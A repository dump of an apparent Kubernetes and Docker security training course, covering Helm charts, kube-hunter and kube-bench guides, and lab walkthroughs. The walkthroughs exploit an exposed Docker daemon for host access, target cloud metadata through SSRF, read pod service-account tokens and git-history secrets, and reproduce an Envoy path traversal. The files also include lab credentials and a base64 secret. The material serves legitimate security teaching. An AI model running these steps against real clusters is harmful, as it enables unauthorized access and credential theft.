4 | 5 | The primary users of the LSM interface are Mandatory Access Control (MAC) extensions which provide a comprehensive security policy. Examples include SELinux, Smack, Tomoyo, and AppArmor. 6 | 7 | ## Demonstration 8 | 9 | * Let's run a simple nginx container 10 | 11 | ```bash 12 | docker run --rm -it --name lsm-before -p 4321:80 nginx bash 13 | 14 | sh 15 | dash 16 | bash 17 | ``` 18 | 19 | ![lsm before nginx](images/lsm-before.png) 20 | 21 | 22 | * Now lets apply the apparmor profile for the container and see if we can perform other operations like `sh` and `dash` 23 | 24 | ```bash 25 | cd /opt/docker-nginx 26 | 27 | sudo bane sample.toml 28 | 29 | docker run --rm -it --name lsm-after \ 30 | --security-opt="apparmor:docker-nginx-sample" -p 4320:80 nginx bash 31 | 32 | sh 33 | dash 34 | bash 35 | ``` 36 | 37 | ![lsm after nginx](images/lsm-after.png) 38 | 39 | 40 | * Have a look at `cat /opt/docker-nginx/docker-nignx-sample` file for the apparmor profile that was created using [bane](https://github.com/genuinetools/bane) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "server-health.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 13 | */}} 14 | {{- define "server-health.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "server-health.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "mailbox-service.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 13 | */}} 14 | {{- define "mailbox-service.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "mailbox-service.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "connectivity-check.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 13 | */}} 14 | {{- define "connectivity-check.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "connectivity-check.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "server-health.fullname" . -}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "server-health.name" . }} 10 | helm.sh/chart: {{ include "server-health.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . | nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . }} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /gitbook/kube-hunter/readme.md: -------------------------------------------------------------------------------- 1 | # Running kube-hunter 2 | 3 | Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster you don't own!** 4 | 5 | ## How to run kube-hunter 6 | 7 | * IP addresses can be obtained by running the following command 8 | 9 | ```bash 10 | kubectl cluster-info 11 | kubectl get nodes -o wide 12 | ``` 13 | 14 | ![](images/get-ip-info.png) 15 | 16 | 17 | * Let's run kube-hunter from outside the cluster as a black box. Select the option `1` to perform "Remote Scanning". 18 | 19 | ```bash 20 | cd /data/kube-hunter 21 | ./kube-hunter.py 22 | ``` 23 | 24 | ![](images/kube-hunter-external.png) 25 | 26 | * We can also run the kube-hunter as a active scan within the cluster as well 27 | 28 | ```bash 29 | cd /data/kube-hunter 30 | kubectl apply -f job.yaml 31 | ``` 32 | 33 | * Get the results by looking at stdout logs of the pod 34 | 35 | ```bash 36 | kubectl get pods --selector job-name=kube-hunter 37 | kubectl logs 38 | ``` 39 | 40 | ![](images/kube-hunter-results.png) 41 | 42 | 43 | ### References 44 | 45 | * [https://github.com/aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "mailbox-service.fullname" . -}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 10 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . | nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . }} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "connectivity-check.fullname" . -}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 10 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . | nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . }} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /gitbook/kube-bench/readme.md: -------------------------------------------------------------------------------- 1 | # Running kube-bench 2 | 3 | kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). 4 | 5 | 1. Master Node Security Configuration 6 | * API Server 7 | * Scheduler 8 | * Controller Manager 9 | * Configuration Files 10 | * etcd 11 | * General Security Primitives 12 | * PodSecurityPolicices 13 | 2. Workere Node Security Configuration 14 | * Kubelet 15 | * Configuration Files 16 | 17 | ## How to run kube-bench 18 | 19 | * We can run kube-bench by navigating to the `cd /data/kube-bench` 20 | 21 | ```bash 22 | kubectl apply -f kube-bench-node.yaml 23 | ``` 24 | 25 | * Check the job status and get the pod name 26 | 27 | ```bash 28 | kubectl get pods --selector job-name=kube-bench-node 29 | ``` 30 | 31 | ![](images/get-kube-bench-pod.png) 32 | 33 | * See the kube-bench node scan results by checking the stdout logs 34 | 35 | ```bash 36 | kubectl logs 37 | ``` 38 | 39 | ![](images/kube-bench-results.png) 40 | 41 | 42 | > Note: Here we are running only for the Kubernetes nodes as this cluster is managed by GCP. We can also run master checks by referring to https://github.com/aquasecurity/kube-bench -------------------------------------------------------------------------------- /gitbook/scenario-2/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Kubernetes Cluster Metadata using SSRF vulnerability - Scenario 2 | 3 | Applications hosted on the cloud can lead to a whole slew of other problems. Especially, vulnerable ones :) 4 | 5 | Bob's company has an application deployed on GCP that allows you to quickly check the health of other web applications on the Internet. The application uses a server side function to connect to the specified URL and let's Bob know if the web app is functioning as expected or not. 6 | 7 | Well, the most common problem applications like this face is not sanitizing user input which allows Bob to specify any endpoint (and of course any port) to make the server perform a GET request. 8 | 9 | This is bad, yes, but it can be worse for applications on the cloud as you can query the helpful metadata endpoints. That is whole playground for you to explore. Let's see what we can do with this scenario! 10 | 11 | ## Tips 12 | 13 | * Endpoint for your attack is `http://server-health.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 14 | * The login credentials for the application are `username: serveradmin` and `password: monitorworld` 15 | * Useful reference: [Google Instance Metadata](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata) `169.254.169.254` -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for server-health. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-server-health 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 30m 39 | memory: 50Mi 40 | requests: 41 | cpu: 20m 42 | memory: 40Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for mailbox-service. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-mailbox-service 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 30m 39 | memory: 50Mi 40 | requests: 41 | cpu: 20m 42 | memory: 40Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for connectivity-check. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-connectivity-check 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 50m 39 | memory: 100Mi 40 | requests: 41 | cpu: 40m 42 | memory: 80Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/code-base/code-base.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Secret 3 | metadata: 4 | name: codebasekey 5 | type: Opaque 6 | data: 7 | codebaseapiloginpass: U3VwZXJTdHJvbmdQYXNzd29yZEAzMjEhCg== 8 | codebaseapikey: ZmxhZzpiMjdlZTM4MWZkOWRhNDlhNDM1ZGNkYjQzMzkwYTI4Ngo= 9 | --- 10 | apiVersion: apps/v1 11 | kind: Deployment 12 | metadata: 13 | name: code-base-deployment 14 | labels: 15 | app: code-base 16 | spec: 17 | selector: 18 | matchLabels: 19 | app: code-base 20 | template: 21 | metadata: 22 | labels: 23 | app: code-base 24 | spec: 25 | containers: 26 | - name: code-base 27 | image: appsecco/k8s-training-code-base 28 | resources: 29 | limits: 30 | cpu: 20m 31 | memory: 30Mi 32 | requests: 33 | cpu: 10m 34 | memory: 20Mi 35 | command: ["/bin/sh"] 36 | args: 37 | - "-c" 38 | - > 39 | tail -f /dev/null 40 | env: 41 | - name: CODEBASE_API_LOGIN_PASS 42 | valueFrom: 43 | secretKeyRef: 44 | name: codebasekey 45 | key: codebaseapiloginpass 46 | - name: CODEBASE_API_KEY 47 | valueFrom: 48 | secretKeyRef: 49 | name: codebasekey 50 | key: codebaseapikey 51 | -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration - Solution 2 | 3 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port `2375` for un-encrypted, and port `2376` for encrypted communication with the daemon. 4 | 5 | * Scan the `2375` and `2376` port using nmap from student VM 6 | 7 | ```bash 8 | nmap -p 2375,2376 -n 192.168.56.4 -v 9 | ``` 10 | 11 | ![nmap scan for port 2375](images/misconfig-nmap-scan.png) 12 | 13 | 14 | * We can query the docker API using `curl` 15 | 16 | ```bash 17 | curl 192.168.56.4:2375/images/json | jq . 18 | ``` 19 | 20 | ![accessing images via curl](images/misconfig-curl-images.png) 21 | 22 | * Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime 23 | 24 | ```bash 25 | docker -H tcp://CTFVMIP:2375 ps 26 | docker -H tcp://CTFVMIP:2375 images 27 | ``` 28 | 29 | ![docker tcp host usage](images/docker-tcp-host-access.png) 30 | 31 | * Now, we have full privilege over the host system :) 32 | 33 | ## Fixing this vulnerability 34 | 35 | * Use the `2376` port for exposing if required to expose the Docker API. Otherwise use `fd` or `socket` to expose the docker runtime daemon -------------------------------------------------------------------------------- /gitbook/popular-attacks/dockerhub.md: -------------------------------------------------------------------------------- 1 | # Dockerhub known vulnerable images 2 | 3 | Docker containers have recently become a popular approach to provision multiple applications over shared physical hosts in a more lightweight fashion than traditional virtual machines. This popularity has led to the creation of the Docker Hub registry, which distributes a large number of official and community images. In this paper, we study the state of security vulnerabilities in Docker Hub images. We create a scalable Docker image vulnerability analysis (DIVA) framework that automatically discovers, downloads, and analyzes both official and community images on Docker Hub. 4 | 5 | Using our framework, we have studied 356,218 images and made the following findings: 6 | 7 | 1. Both official and community images contain more than 180 vulnerabilities on average when considering all versions 8 | 2. Many images have not been updated for hundreds of days 9 | 3. Vulnerabilities commonly propagate from parent images to child images 10 | 11 | These findings demonstrate a strong need for more automated and systematic methods of applying security updates to Docker images and our current Docker image analysis framework provides a good foundation for such automatic security update. 12 | 13 | 14 | * Read more about [A Study of Security Vulnerabilities on Docker Hub](http://dance.csc.ncsu.edu/papers/codaspy17.pdf) 15 | 16 | * [Research Paper](https://dl.acm.org/citation.cfm?id=3029832) -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/misconfiguration.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration 2 | 3 | In this scenario we will see that misconfigured `docker` with port 2375 running and exposed. We will use this with docker runtime host option to access the contianers, images and gain host system privileges. 4 | 5 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port `2375` for un-encrypted, and port `2376` for encrypted communication with the daemon. 6 | 7 | * Scan the `2375` and `2376` port using nmap from student VM 8 | 9 | ```bash 10 | nmap -p 2375,2376 -n 192.168.56.4 -v 11 | ``` 12 | 13 | ![nmap scan for port 2375](images/misconfig-nmap-scan.png) 14 | 15 | 16 | * We can query the docker API using `curl` 17 | 18 | ```bash 19 | curl 192.168.56.4:2375/images/json | jq . 20 | ``` 21 | 22 | ![accessing images via curl](images/misconfig-curl-images.png) 23 | 24 | * Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime 25 | 26 | ```bash 27 | docker -H tcp://CTFVMIP:2375 ps 28 | docker -H tcp://CTFVMIP:2375 images 29 | ``` 30 | 31 | ![docker tcp host usage](images/docker-tcp-host-access.png) 32 | 33 | * Now, we have full privilege over the host system :) 34 | -------------------------------------------------------------------------------- /gitbook/deploy-app/using-helm.md: -------------------------------------------------------------------------------- 1 | # Deploying simple application in Kubernetes Cluster using Helm Chart 2 | 3 | * Deploying an app using basic helm chart, navigate to `sample-nginx` helm chart folder 4 | 5 | ```bash 6 | cd /data/sample-nginx 7 | ``` 8 | 9 | * Deploy the helm chart by running the following command 10 | 11 | ```bash 12 | helm install --name sample-nginx . 13 | ``` 14 | 15 | ![](images/helm-deploy.png) 16 | 17 | * Access the app using output template 18 | 19 | ```bash 20 | export POD_NAME=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=sample-nginx,app.kubernetes.io/instance=sample-nginx" -o jsonpath="{.items[0].metadata.name}") 21 | kubectl port-forward $POD_NAME 8080:80 22 | ``` 23 | 24 | * Visit http://127.0.0.1:8080 to use your application 25 | 26 | ![](images/helm-deploy-access.png) 27 | 28 | * Change the `values.yaml` in the sample-nginx helm chart. Replace `tag: alpine` with `tag: latest` 29 | 30 | ```bash 31 | ... 32 | tag: alpine 33 | ... 34 | 35 | to 36 | 37 | ... 38 | tag: latest 39 | ... 40 | ``` 41 | 42 | * Upgrade the helm chart with new release 43 | 44 | ```bash 45 | helm upgrade sample-nginx . 46 | ``` 47 | 48 | * Check the helm chart details and revisions 49 | 50 | ```bash 51 | helm ls sample-nginx 52 | ``` 53 | ![](images/helm-ls.png) 54 | 55 | * Deleting the helm chart 56 | 57 | ```bash 58 | helm delete --purge sample-nginx 59 | ``` 60 | 61 | ### References 62 | 63 | * [https://docs.helm.sh/](https://docs.helm.sh/) -------------------------------------------------------------------------------- /gitbook/extra/play-with-kubernetes.md: -------------------------------------------------------------------------------- 1 | # Play with Kubernetes 2 | 3 | Play with Kubernetes is a labs site provided by Docker and created by Tutorius. Play with Kubernetes is a playground which allows users to run K8s clusters in a matter of seconds. It gives the experience of having a free Alpine Linux Virtual Machine in browser. Under the hood Docker-in-Docker (DinD) is used to give the effect of multiple VMs/PCs. 4 | 5 | If you want to learn more about Kubernetes, consider the Play with Kubernetes Classroom which provides more directed learning using an integrated Play with Kubernetes commandline. 6 | 7 | [https://labs.play-with-k8s.com](https://labs.play-with-k8s.com/) 8 | 9 | ## Kubernetes for Beginners 10 | 11 | In this hands-on workshop, you will learn the basic concepts of Kubernetes. You will do that through interacting with Kubernetes through the command line terminals on the right. Ultimately you will deploy the sample application `Dockercoins` on both worker nodes. 12 | 13 | [https://training.play-with-kubernetes.com/kubernetes-workshop/](https://training.play-with-kubernetes.com/kubernetes-workshop/) 14 | 15 | ## Katacoda 16 | 17 | This is a Kubernetes playground. From here you can play with a Kubernetes host and explore it's API. 18 | 19 | > Playgrounds give you a configured environment to start playing and exploring using an unstructured learning approach 20 | 21 | [https://www.katacoda.com/courses/kubernetes/playground](https://www.katacoda.com/courses/kubernetes/playground) -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-swarm.md: -------------------------------------------------------------------------------- 1 | # Docker Swarm 2 | 3 | A swarm is a group of machines that are running Docker and joined into a cluster. After that has happened, you continue to run the Docker commands you're used to, but now they are executed on a cluster by a swarm manager. The machines in a swarm can be physical or virtual. 4 | 5 | 6 | * Let's setup docker swarm cluster 7 | 8 | ```bash 9 | docker swarm init 10 | ``` 11 | 12 | * Check the list of nodes 13 | 14 | ```bash 15 | docker node ls 16 | ``` 17 | 18 | ![list docker nodes](images/docker-node.png) 19 | 20 | * Starting new service in docker swarm cluster 21 | 22 | ```bash 23 | docker service create --replicas 1 --publish 5555:80 --name nginxservice nginx:alpine 24 | ``` 25 | 26 | ![creating service](images/docker-service-create.png) 27 | 28 | * Look at the running services 29 | 30 | ```bash 31 | docker service ls 32 | ``` 33 | 34 | * Inspecting the service 35 | 36 | ```bash 37 | docker service inspect --pretty nginxservice 38 | ``` 39 | 40 | * Accessing the service 41 | 42 | ```bash 43 | curl STUDENTIP:5555 44 | ``` 45 | 46 | ![accessing the service](images/docker-service-access.png) 47 | 48 | * Removing the service 49 | 50 | ```bash 51 | docker service rm nginxservice 52 | ``` 53 | 54 | * Leaving the swarm cluster 55 | 56 | ```bash 57 | docker swarm leave 58 | 59 | # If only one node in the cluster 60 | docker swarm leave --force 61 | ``` 62 | 63 | ## References 64 | 65 | * [Getting started with swarm](https://docs.docker.com/engine/swarm/swarm-tutorial/) -------------------------------------------------------------------------------- /gitbook/scenario-3/solution.md: -------------------------------------------------------------------------------- 1 | # Testing for the sensitive configurations and secrets in Kubernetes cluster - Solution 2 | 3 | ## Exec into Pod 4 | 5 | * Get pod details and login to the `code-base` pod using below command 6 | 7 | ```bash 8 | export CODEBASE_POD_NAME=$(kubectl get pods --selector app=code-base -o jsonpath="{.items[0].metadata.name}") 9 | kubectl exec -it $CODEBASE_POD_NAME sh 10 | ``` 11 | 12 | ![](images/exec-pod.png) 13 | 14 | ## Kubernetes Service Account 15 | 16 | * Now we can look for sensitive information by navigating the file system 17 | 18 | * Look in the default kubernetes locations 19 | 20 | ```bash 21 | ls -l /var/run/secrets/kubernetes.io/serviceaccount/ 22 | cat /var/run/secrets/kubernetes.io/serviceaccount/token 23 | ``` 24 | 25 | ![](images/default-svc.png) 26 | 27 | * Explore permissions available to service account using `kubectl auth can-i` 28 | 29 | `kubectl` can be downloaded inside the Pod from [Install Kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/#install-kubectl-on-linux) 30 | 31 | ## Check Environment 32 | 33 | * Check for the environment variables 34 | 35 | ![](images/printenv.png) 36 | 37 | ## App Secrets 38 | 39 | * Find the app and the `.git` folder inside it which has old commits containing the sensitive information 40 | 41 | ```bash 42 | cd /app 43 | ls -la 44 | git log 45 | git checkout f17a07721ab9acec96aef0b1794ee466e516e37a 46 | ls -la 47 | cat .env 48 | ``` 49 | 50 | ![](images/git-app.png) 51 | ![](images/commit-log.png) 52 | ![](images/revert-and-secrets.png) 53 | -------------------------------------------------------------------------------- /gitbook/demos/cve-2019-9901.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-9901 - Istio/Envoy Path traversal 2 | 3 | This scenario demos has been taken from [https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md](https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md). Thanks to [Erlend Oftedal](https://github.com/eoftedal) 4 | 5 | A simple project with a web server and deployed it on Kubernetes. The web application had two endpoints `/public/` and `/secret/`. Added an authorization policy which tried to grant access to anything below `/public/`: 6 | 7 | ```yaml 8 | rules: 9 | - services: ["backend.fishy.svc.cluster.local"] 10 | methods: ["GET"] 11 | paths: ["/public/*"] 12 | ``` 13 | 14 | Then used standard path traversal from curl: 15 | 16 | ```bash 17 | curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/" 18 | ``` 19 | 20 | And was able to reach `/secret/`. 21 | 22 | 23 | ### Reference 24 | 25 | * [Security postmortem for CVE-2019-9900, CVE-2019-9901](https://github.com/envoyproxy/envoy/blob/master/security/postmortems/cve-2019-9900.md) 26 | * [Announcing Istio 1.1.2 with Important Security Update](https://istio.io/blog/2019/announcing-1.1.2/#vulnerability-impact) 27 | * [CVE-2019-9901 - Istio/Envoy Path traversal](https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md) 28 | * [Envoy Proxy — high severity vulnerabilities that can lead to exposure of unauthorized services](https://medium.com/solo-io/envoy-proxy-high-severity-vulnerabilities-that-can-lead-to-exposure-of-unauthorized-services-e5af25b022de) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . }} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "server-health.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the 